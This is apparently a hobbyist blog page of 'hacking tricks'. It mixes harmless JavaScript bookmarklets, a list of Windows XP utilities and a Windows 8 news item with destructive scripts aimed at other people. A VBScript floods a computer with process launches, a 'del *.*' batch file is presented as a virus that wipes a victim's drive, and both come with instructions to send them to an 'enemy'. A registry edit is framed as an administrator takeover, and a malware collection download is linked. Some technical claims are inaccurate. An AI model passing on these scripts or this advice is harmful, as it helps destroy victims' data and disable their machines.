banner

Cool JavaScript Tricks and Codes



Here is list of some cool java script Codes.To run these scripts you have to copy and paste these codes in your web browser and then hit enter.The java script will get executed.Javascript is a very cool language if you how to play with it.Check out some best example of this language.
1.This script code will pulls off all the images from your web page and rotates them in a circle. The best place to test is a website with many images. (Google Images for an example).you can try it on google .com also.


javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName(“img”); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position=’absolute’; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+”px”; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+”px”}R++}setInterval(‘A()’,5); void(0);
2.Shake the Browser.This Script will shake your browser check it out
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i–) {for (j = n; j > 0; j–) {self.moveBy(1,i) ;self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
3.Cool message trick Just type your message..
javascript: contentBodyEditable="true".DesginMode="Message"
 
 

Windows Hidden Tools



Are you a Windows XP User ? How many utilities do you know that is built-in Windows XP ? Notepad, Wordpad, Character Map, Calculator, Microsoft Paint, these are the few utilities that I usually use.But out of blue,Windows Xp is a fully loaded package which has a lot of apparently hidden utilities which are seldom accessed by a basic or normal computer users ; and trust me,they still pack a lot of punch. 
To run any of these apps go to Start > Run and type the executable name (i.e. charmap) and press Enter.
Character Map (charmap.exe) - Very useful for finding unusual characters.
Disk Cleanup (cleanmgr.exe) – The usual Disc cleanup.
Clipboard Viewer (clipbrd.exe) - Views contents of Windows clipboard.
Dr Watson (drwtsn32.exe) - Troubleshooting tool,runs when windows crashes.
DirectX diagnosis (dxdiag.exe) - Diagnose & test DirectX, video & sound cards.
Private character editor (eudcedit.exe) - Allows creation or modification of characters.
IExpress Wizard (iexpress.exe) - Create self-extracting / self-installing package.
Microsoft Synchronization Manager (mobsync.exe) - Appears to allow synchronization of files on the network for when working offline. Apparently undocumented.
Windows Media Player 5.1(mplay32.exe) - Retro version of Media Player, very basic.
ODBC Data Source Administrator (odbcad32.exe) – Database connection utility for support with external servers,create ODBC data sources,to administer remote databases or for supporting the ODBC database utility in Visual basic language.
Object Packager (packager.exe) - To do with packaging objects for insertion in files, appears to have comprehensive help files.
System Monitor (perfmon.exe) - Very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for budding uber-geeks only.
Program Manager (progman.exe) - Legacy Windows 3.x desktop shell.
Remote Access phone book (rasphone.exe) - Documentation is virtually non-existent.
Registry Editor (regedt32.exe or regedit.exe) – For making custom changes or hacking the Windows Registry.
Network shared folder wizard (shrpubw.exe) - Creates shared folders on network.
File signature verification tool (sigverif.exe) - This tool will search the operating system and identify any unsigned device drivers installed on the system. It will also verify all signed device drivers.
Volume Control (sndvol32.exe) - I've included this for those people that lose it from the System Notification area.
System Configuration Editor (sysedit.exe) - Modify System.ini & Win.ini just like in Win98! .
Syskey (syskey.exe) - Secures XP Account database, use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications.
Microsoft Telnet Client (telnet.exe) – Built in telnet client which can be used to connect to servers to sent emails or to hack :) This is disabled in in vista  but you can re-enable it by going to
Control panel –> Programs and Features –> Click "Turn Windows features on or off" on left –> Scroll down and check "Telnet Client.
Driver Verifier Manager (verifier.exe) - Seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented.
Windows for Workgroups Chat (winchat.exe) - Appears to be an old NT utility to allow chat sessions over a LAN, help files available.
System configuration (msconfig.exe) - Can use to control startup programs,make changes to startup of XP.
Group Policy Editor (gpedit.msc) - Used to manage group policies, and permissions.Its an Administrator only tool.


Cheers and keep learning.

Microsoft Unveils First Windows 8 Preview


We have seen leaked images and downloads of Windows 8 OS but this time Microsoft has finally unveiled the very first video demonstration showing us what's in the store for upcoming major upgrade to Windows platform.
The video demos the next generation of Windows, internally code-named “Windows 8”. According to the official announcement the "Windows 8" based PC is really a new kind of device completely revamped from the chip to the user-interface, one that scales from touch-only small screens through to large screens, with or without a keyboard and mouse.
The demo shows the metro tile based user-interface for a new generation of touch-centric hardware. Fast, fluid and dynamic, the experience has been transformed while keeping the power, flexibility and connectivity of Windows intact - watch the full video after the jump.
Here are a few aspects of the new interface we showed today:
• Fast launching of apps from a tile-based Start screen, which replaces the Windows Start menu with a customizable, scalable full-screen view of apps.
Live tiles with notifications, showing always up-to-date information from your apps.
• Fluid, natural switching between running apps.
• Convenient ability to snap and resize an app to the side of the screen, so you can really multitask using the capabilities of Windows.
• Web-connected and Web-powered apps built using HTML5 and JavaScript that have access to the full power of the PC.
• Fully touch-optimized browsing, with all the power of hardware-accelerated Internet Explorer 10.
Windows 8 Official First Preview

Crash your enemy computer




USE THIS ON YOUR OWN RESPONSIBILITY
This Will Crash Your enemy Computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next



Save It As Anything.vbs and send it to your enemy.never double-click this file..
It Only Works With Windows XP

6 Character Batch Virus


This is a very short tutorial describing how to make a very simple batch virus which consists of only 6 characters.

This virus will delete every file with any file extension.

Here's the code:
Quote:
del *.*
3 Easy Steps to Turn It Into a Virus
1)Type that into notepad.
2)Save the file as a ".bat".
3)Send it.

As the unsuspecting victim opens the file, his whole hard-drive will be erased.

send it ti ur enemy's

Automatic Administrator Login:


Automatic Administrator Login:
Hacking the system registry from any account having access to system registry puts you in to the administrator account.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“AutoAdminLogon”=”1″

Ultimate virus collection.


Ultimate virus collection. a dangerous one.
This is only meant for education purpose. The user will be responsible for any damage if caused.
Use it carefully. All viruses are dangerous.
download link:

http://rapidshare.com/files/152561063/6000.Viruses.VX.Collector-Malware.Researcher.Starter.Kit.rar


banner